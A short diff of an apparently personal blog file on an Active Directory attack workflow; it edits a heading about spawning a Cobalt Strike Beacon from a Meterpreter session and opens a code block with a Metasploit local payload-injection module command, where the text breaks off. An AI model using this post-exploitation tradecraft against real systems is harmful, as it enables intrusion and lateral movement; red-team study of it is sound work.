l0wc0ster/blog/ad_workflow.md

 MSF and Cobalt are friend's forever

-Spawn BEACON from meterpreter to cobalt strike
+Spawn BEACON from meterpreter to Сobalt Strike

 ```
 use exploit/windows/local/ payload_inject